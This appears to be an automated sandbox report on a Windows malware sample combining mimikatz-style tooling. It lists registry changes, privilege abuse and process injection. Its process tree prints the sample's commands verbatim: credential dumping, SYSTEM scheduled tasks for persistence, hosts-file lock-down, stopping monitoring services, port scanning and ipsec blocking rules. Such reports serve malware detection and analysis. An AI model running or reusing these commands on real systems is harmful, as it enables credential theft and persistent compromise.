\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language jbebikp.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language iubvuzbtm.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cacls.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language xohudmc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language sc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cacls.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cacls.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language sc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cacls.exe -
System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 2 IoCs
Adversaries may check for Internet connectivity on compromised systems.
pid Process 4812 cmd.exe 1252 PING.EXE -
NSIS installer 3 IoCs
resource yara_rule behavioral2/files/0x0007000000023ca2-6.dat nsis_installer_2 behavioral2/files/0x0011000000023cb4-15.dat nsis_installer_1 behavioral2/files/0x0011000000023cb4-15.dat nsis_installer_2 -
Modifies data under HKEY_USERS 45 IoCs
description ioc Process Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump bmgumyclb.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump bmgumyclb.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" bmgumyclb.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump bmgumyclb.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" bmgumyclb.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump bmgumyclb.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" jbebikp.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" bmgumyclb.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" bmgumyclb.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump bmgumyclb.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" bmgumyclb.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" bmgumyclb.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" bmgumyclb.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" jbebikp.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" bmgumyclb.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump bmgumyclb.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump bmgumyclb.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing bmgumyclb.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump bmgumyclb.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" jbebikp.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump bmgumyclb.exe Key created \REGISTRY\USER\.DEFAULT\Software bmgumyclb.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" bmgumyclb.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump bmgumyclb.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" bmgumyclb.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump bmgumyclb.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump bmgumyclb.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ jbebikp.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump bmgumyclb.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump bmgumyclb.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" bmgumyclb.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing jbebikp.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" bmgumyclb.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" bmgumyclb.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" bmgumyclb.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" bmgumyclb.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" bmgumyclb.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals bmgumyclb.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump bmgumyclb.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" bmgumyclb.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump bmgumyclb.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" bmgumyclb.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump bmgumyclb.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" jbebikp.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump bmgumyclb.exe -
Modifies registry class 14 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.bat\ = "txtfile" jbebikp.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.js\ jbebikp.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.vbs\ jbebikp.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.reg\ jbebikp.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.cmd\ jbebikp.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.ps1\ = "txtfile" jbebikp.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.cmd\ = "txtfile" jbebikp.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.vbs\ = "txtfile" jbebikp.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.vbe\ jbebikp.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.ps1\ jbebikp.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.bat\ jbebikp.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.js\ = "txtfile" jbebikp.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.VBE\ = "txtfile" jbebikp.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.reg\ = "txtfile" jbebikp.exe -
Runs net.exe
-
Runs ping.exe 1 TTPs 1 IoCs
pid Process 1252 PING.EXE -
Scheduled Task/Job: Scheduled Task 1 TTPs 3 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 1888 schtasks.exe 3552 schtasks.exe 2776 schtasks.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 4188 jbebikp.exe 4188 jbebikp.exe 4188 jbebikp.exe 4188 jbebikp.exe 4188 jbebikp.exe 4188 jbebikp.exe 4188 jbebikp.exe 4188 jbebikp.exe 4188 jbebikp.exe 4188 jbebikp.exe 4188 jbebikp.exe 4188 jbebikp.exe 4188 jbebikp.exe 4188 jbebikp.exe 4188 jbebikp.exe 4188 jbebikp.exe 4188 jbebikp.exe 4188 jbebikp.exe 4188 jbebikp.exe 4188 jbebikp.exe 4188 jbebikp.exe 4188 jbebikp.exe 4188 jbebikp.exe 4188 jbebikp.exe 4188 jbebikp.exe 4188 jbebikp.exe 4188 jbebikp.exe 4188 jbebikp.exe 4188 jbebikp.exe 4188 jbebikp.exe 4188 jbebikp.exe 4188 jbebikp.exe 4188 jbebikp.exe 4188 jbebikp.exe 4188 jbebikp.exe 4188 jbebikp.exe 4188 jbebikp.exe 4188 jbebikp.exe 4188 jbebikp.exe 4188 jbebikp.exe 4188 jbebikp.exe 4188 jbebikp.exe 4188 jbebikp.exe 4188 jbebikp.exe 4188 jbebikp.exe 4188 jbebikp.exe 4188 jbebikp.exe 4188 jbebikp.exe 4188 jbebikp.exe 4188 jbebikp.exe 4188 jbebikp.exe 4188 jbebikp.exe 4188 jbebikp.exe 4188 jbebikp.exe 4188 jbebikp.exe 4188 jbebikp.exe 4188 jbebikp.exe 4188 jbebikp.exe 4188 jbebikp.exe 4188 jbebikp.exe 4188 jbebikp.exe 4188 jbebikp.exe 4188 jbebikp.exe 4188 jbebikp.exe -
Suspicious behavior: LoadsDriver 15 IoCs
pid Process 652 Process not Found 652 Process not Found 652 Process not Found 652 Process not Found 652 Process not Found 652 Process not Found 652 Process not Found 652 Process not Found 652 Process not Found 652 Process not Found 652 Process not Found 652 Process not Found 652 Process not Found 652 Process not Found 652 Process not Found -
Suspicious behavior: RenamesItself 1 IoCs
pid Process 3064 2024-11-02_a7e05913d3c0db0c3cb3f7f115b48ed3_hacktools_icedid_mimikatz.exe -
Suspicious use of AdjustPrivilegeToken 24 IoCs
description pid Process Token: SeDebugPrivilege 3064 2024-11-02_a7e05913d3c0db0c3cb3f7f115b48ed3_hacktools_icedid_mimikatz.exe Token: SeDebugPrivilege 4444 jbebikp.exe Token: SeDebugPrivilege 4188 jbebikp.exe Token: SeDebugPrivilege 856 vfshost.exe Token: SeDebugPrivilege 896 bmgumyclb.exe Token: SeLockMemoryPrivilege 1400 ctittb.exe Token: SeLockMemoryPrivilege 1400 ctittb.exe Token: SeDebugPrivilege 1568 bmgumyclb.exe Token: SeDebugPrivilege 2968 bmgumyclb.exe Token: SeDebugPrivilege 3972 bmgumyclb.exe Token: SeDebugPrivilege 2216 bmgumyclb.exe Token: SeDebugPrivilege 3800 bmgumyclb.exe Token: SeDebugPrivilege 3304 bmgumyclb.exe Token: SeDebugPrivilege 3936 bmgumyclb.exe Token: SeDebugPrivilege 804 bmgumyclb.exe Token: SeDebugPrivilege 344 bmgumyclb.exe Token: SeDebugPrivilege 400 bmgumyclb.exe Token: SeDebugPrivilege 4016 bmgumyclb.exe Token: SeDebugPrivilege 2728 bmgumyclb.exe Token: SeDebugPrivilege 624 bmgumyclb.exe Token: SeDebugPrivilege 3316 bmgumyclb.exe Token: SeDebugPrivilege 2376 bmgumyclb.exe Token: SeDebugPrivilege 2196 bmgumyclb.exe Token: SeDebugPrivilege 3492 bmgumyclb.exe -
Suspicious use of SetWindowsHookEx 12 IoCs
pid Process 3064 2024-11-02_a7e05913d3c0db0c3cb3f7f115b48ed3_hacktools_icedid_mimikatz.exe 3064 2024-11-02_a7e05913d3c0db0c3cb3f7f115b48ed3_hacktools_icedid_mimikatz.exe 4444 jbebikp.exe 4444 jbebikp.exe 4188 jbebikp.exe 4188 jbebikp.exe 2240 xohudmc.exe 2924 ewqksq.exe 4832 jbebikp.exe 4832 jbebikp.exe 6548 jbebikp.exe 6548 jbebikp.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 3064 wrote to memory of 4812 3064 2024-11-02_a7e05913d3c0db0c3cb3f7f115b48ed3_hacktools_icedid_mimikatz.exe 85 PID 3064 wrote to memory of 4812 3064 2024-11-02_a7e05913d3c0db0c3cb3f7f115b48ed3_hacktools_icedid_mimikatz.exe 85 PID 3064 wrote to memory of 4812 3064 2024-11-02_a7e05913d3c0db0c3cb3f7f115b48ed3_hacktools_icedid_mimikatz.exe 85 PID 4812 wrote to memory of 1252 4812 cmd.exe 87 PID 4812 wrote to memory of 1252 4812 cmd.exe 87 PID 4812 wrote to memory of 1252 4812 cmd.exe 87 PID 4812 wrote to memory of 4444 4812 cmd.exe 95 PID 4812 wrote to memory of 4444 4812 cmd.exe 95 PID 4812 wrote to memory of 4444 4812 cmd.exe 95 PID 4188 wrote to memory of 5028 4188 jbebikp.exe 97 PID 4188 wrote to memory of 5028 4188 jbebikp.exe 97 PID 4188 wrote to memory of 5028 4188 jbebikp.exe 97 PID 5028 wrote to memory of 1732 5028 cmd.exe 99 PID 5028 wrote to memory of 1732 5028 cmd.exe 99 PID 5028 wrote to memory of 1732 5028 cmd.exe 99 PID 5028 wrote to memory of 1380 5028 cmd.exe 100 PID 5028 wrote to memory of 1380 5028 cmd.exe 100 PID 5028 wrote to memory of 1380 5028 cmd.exe 100 PID 5028 wrote to memory of 3880 5028 cmd.exe 101 PID 5028 wrote to memory of 3880 5028 cmd.exe 101 PID 5028 wrote to memory of 3880 5028 cmd.exe 101 PID 5028 wrote to memory of 2120 5028 cmd.exe 102 PID 5028 wrote to memory of 2120 5028 cmd.exe 102 PID 5028 wrote to memory of 2120 5028 cmd.exe 102 PID 5028 wrote to memory of 4684 5028 cmd.exe 103 PID 5028 wrote to memory of 4684 5028 cmd.exe 103 PID 5028 wrote to memory of 4684 5028 cmd.exe 103 PID 5028 wrote to memory of 4092 5028 cmd.exe 104 PID 5028 wrote to memory of 4092 5028 cmd.exe 104 PID 5028 wrote to memory of 4092 5028 cmd.exe 104 PID 4188 wrote to memory of 3896 4188 jbebikp.exe 108 PID 4188 wrote to memory of 3896 4188 jbebikp.exe 108 PID 4188 wrote to memory of 3896 4188 jbebikp.exe 108 PID 4188 wrote to memory of 2820 4188 jbebikp.exe 110 PID 4188 wrote to memory of 2820 4188 jbebikp.exe 110 PID 4188 wrote to memory of 2820 4188 jbebikp.exe 110 PID 4188 wrote to memory of 680 4188 jbebikp.exe 112 PID 4188 wrote to memory of 680 4188 jbebikp.exe 112 PID 4188 wrote to memory of 680 4188 jbebikp.exe 112 PID 4188 wrote to memory of 4076 4188 jbebikp.exe 114 PID 4188 wrote to memory of 4076 4188 jbebikp.exe 114 PID 4188 wrote to memory of 4076 4188 jbebikp.exe 114 PID 4076 wrote to memory of 4360 4076 cmd.exe 116 PID 4076 wrote to memory of 4360 4076 cmd.exe 116 PID 4076 wrote to memory of 4360 4076 cmd.exe 116 PID 4360 wrote to memory of 2448 4360 wpcap.exe 117 PID 4360 wrote to memory of 2448 4360 wpcap.exe 117 PID 4360 wrote to memory of 2448 4360 wpcap.exe 117 PID 2448 wrote to memory of 2988 2448 net.exe 119 PID 2448 wrote to memory of 2988 2448 net.exe 119 PID 2448 wrote to memory of 2988 2448 net.exe 119 PID 4360 wrote to memory of 1848 4360 wpcap.exe 120 PID 4360 wrote to memory of 1848 4360 wpcap.exe 120 PID 4360 wrote to memory of 1848 4360 wpcap.exe 120 PID 1848 wrote to memory of 856 1848 net.exe 122 PID 1848 wrote to memory of 856 1848 net.exe 122 PID 1848 wrote to memory of 856 1848 net.exe 122 PID 4360 wrote to memory of 2012 4360 wpcap.exe 123 PID 4360 wrote to memory of 2012 4360 wpcap.exe 123 PID 4360 wrote to memory of 2012 4360 wpcap.exe 123 PID 2012 wrote to memory of 1864 2012 net.exe 125 PID 2012 wrote to memory of 1864 2012 net.exe 125 PID 2012 wrote to memory of 1864 2012 net.exe 125 PID 4360 wrote to memory of 1448 4360 wpcap.exe 126
Processes
-
C:\Windows\System32\spoolsv.exeC:\Windows\System32\spoolsv.exe1⤵PID:1808
-
C:\Windows\TEMP\vtbmbiubv\ctittb.exe"C:\Windows\TEMP\vtbmbiubv\ctittb.exe"2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:1400
-
-
C:\Users\Admin\AppData\Local\Temp\2024-11-02_a7e05913d3c0db0c3cb3f7f115b48ed3_hacktools_icedid_mimikatz.exe"C:\Users\Admin\AppData\Local\Temp\2024-11-02_a7e05913d3c0db0c3cb3f7f115b48ed3_hacktools_icedid_mimikatz.exe"1⤵
- Drops file in Windows directory
- Suspicious behavior: RenamesItself
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:3064 -
C:\Windows\SysWOW64\cmd.execmd /c ping 127.0.0.1 -n 5 & Start C:\Windows\tmbllbvl\jbebikp.exe2⤵
- System Location Discovery: System Language Discovery
- System Network Configuration Discovery: Internet Connection Discovery
- Suspicious use of WriteProcessMemory
PID:4812 -
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -n 53⤵
- System Location Discovery: System Language Discovery
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:1252
-
-
C:\Windows\tmbllbvl\jbebikp.exeC:\Windows\tmbllbvl\jbebikp.exe3⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
PID:4444
-
-
-
C:\Windows\tmbllbvl\jbebikp.exeC:\Windows\tmbllbvl\jbebikp.exe1⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Drops file in Drivers directory
- Event Triggered Execution: Image File Execution Options Injection
- Executes dropped EXE
- Drops file in System32 directory
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Modifies data under HKEY_USERS
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:4188 -
C:\Windows\SysWOW64\cmd.execmd /c echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D users & echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D administrators & echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D SYSTEM2⤵
- Suspicious use of WriteProcessMemory
PID:5028 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
- System Location Discovery: System Language Discovery
PID:1732
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\drivers\etc\hosts /T /D users3⤵PID:1380
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
- System Location Discovery: System Language Discovery
PID:3880
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\drivers\etc\hosts /T /D administrators3⤵
- System Location Discovery: System Language Discovery
PID:2120
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
- System Location Discovery: System Language Discovery
PID:4684
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\drivers\etc\hosts /T /D SYSTEM3⤵
- System Location Discovery: System Language Discovery
PID:4092
-
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static del all2⤵
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
PID:3896
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add policy name=Bastards description=FuckingBastards2⤵
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
PID:2820
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filteraction name=BastardsList action=block2⤵
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
PID:680
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Windows\luzcwvvny\bmzbiruiz\wpcap.exe /S2⤵
- Suspicious use of WriteProcessMemory
PID:4076 -
C:\Windows\luzcwvvny\bmzbiruiz\wpcap.exeC:\Windows\luzcwvvny\bmzbiruiz\wpcap.exe /S3⤵
- Drops file in Drivers directory
- Executes dropped EXE
- Loads dropped DLL
- Drops file in System32 directory
- Drops file in Program Files directory
- Suspicious use of WriteProcessMemory
PID:4360 -
C:\Windows\SysWOW64\net.exenet stop "Boundary Meter"4⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2448 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop "Boundary Meter"5⤵
- System Location Discovery: System Language Discovery
PID:2988
-
-
-
C:\Windows\SysWOW64\net.exenet stop "TrueSight Meter"4⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:1848 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop "TrueSight Meter"5⤵
- System Location Discovery: System Language Discovery
PID:856
-
-
-
C:\Windows\SysWOW64\net.exenet stop npf4⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2012 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop npf5⤵
- System Location Discovery: System Language Discovery
PID:1864
-
-
-
C:\Windows\SysWOW64\net.exenet start npf4⤵PID:1448
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 start npf5⤵
- System Location Discovery: System Language Discovery
PID:1884
-
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c net start npf2⤵
- System Location Discovery: System Language Discovery
PID:3916 -
C:\Windows\SysWOW64\net.exenet start npf3⤵
- System Location Discovery: System Language Discovery
PID:2184 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 start npf4⤵PID:1732
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c net start npf2⤵
- System Location Discovery: System Language Discovery
PID:4372 -
C:\Windows\SysWOW64\net.exenet start npf3⤵PID:2376
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 start npf4⤵
- System Location Discovery: System Language Discovery
PID:2356
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Windows\luzcwvvny\bmzbiruiz\zpviuibgv.exe -p 80 222.186.128.1-222.186.255.255 --rate=512 -oJ C:\Windows\luzcwvvny\bmzbiruiz\Scant.txt2⤵PID:4908
-
C:\Windows\luzcwvvny\bmzbiruiz\zpviuibgv.exeC:\Windows\luzcwvvny\bmzbiruiz\zpviuibgv.exe -p 80 222.186.128.1-222.186.255.255 --rate=512 -oJ C:\Windows\luzcwvvny\bmzbiruiz\Scant.txt3⤵
- Executes dropped EXE
- Loads dropped DLL
PID:3896
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Windows\luzcwvvny\Corporate\vfshost.exe privilege::debug sekurlsa::logonpasswords exit >> C:\Windows\luzcwvvny\Corporate\log.txt2⤵
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
PID:5052 -
C:\Windows\luzcwvvny\Corporate\vfshost.exeC:\Windows\luzcwvvny\Corporate\vfshost.exe privilege::debug sekurlsa::logonpasswords exit3⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:856
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c echo Y|schtasks /create /sc minute /mo 1 /tn "mpbkiglcb" /ru system /tr "cmd /c C:\Windows\ime\jbebikp.exe"2⤵
- System Location Discovery: System Language Discovery
PID:4292 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
- System Location Discovery: System Language Discovery
PID:3092
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /sc minute /mo 1 /tn "mpbkiglcb" /ru system /tr "cmd /c C:\Windows\ime\jbebikp.exe"3⤵
- Scheduled Task/Job: Scheduled Task
PID:3552
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c echo Y|schtasks /create /sc minute /mo 1 /tn "bklitvbmu" /ru system /tr "cmd /c echo Y|cacls C:\Windows\tmbllbvl\jbebikp.exe /p everyone:F"2⤵
- System Location Discovery: System Language Discovery
PID:388 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
- System Location Discovery: System Language Discovery
PID:3080
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /sc minute /mo 1 /tn "bklitvbmu" /ru system /tr "cmd /c echo Y|cacls C:\Windows\tmbllbvl\jbebikp.exe /p everyone:F"3⤵
- System Location Discovery: System Language Discovery
- Scheduled Task/Job: Scheduled Task
PID:2776
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c echo Y|schtasks /create /sc minute /mo 1 /tn "nbtbicikb" /ru system /tr "cmd /c echo Y|cacls C:\Windows\TEMP\vtbmbiubv\ctittb.exe /p everyone:F"2⤵
- System Location Discovery: System Language Discovery
PID:404 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
- System Location Discovery: System Language Discovery
PID:912
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /sc minute /mo 1 /tn "nbtbicikb" /ru system /tr "cmd /c echo Y|cacls C:\Windows\TEMP\vtbmbiubv\ctittb.exe /p everyone:F"3⤵
- System Location Discovery: System Language Discovery
- Scheduled Task/Job: Scheduled Task
PID:1888
-
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=139 protocol=TCP2⤵
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
PID:3032
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=139 protocol=UDP2⤵
- Event Triggered Execution: Netsh Helper DLL
PID:4520
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add rule name=Rule1 policy=Bastards filterlist=BastardsList filteraction=BastardsList2⤵
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
PID:2252
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static set policy name=Bastards assign=y2⤵
- Event Triggered Execution: Netsh Helper DLL
PID:4556
-
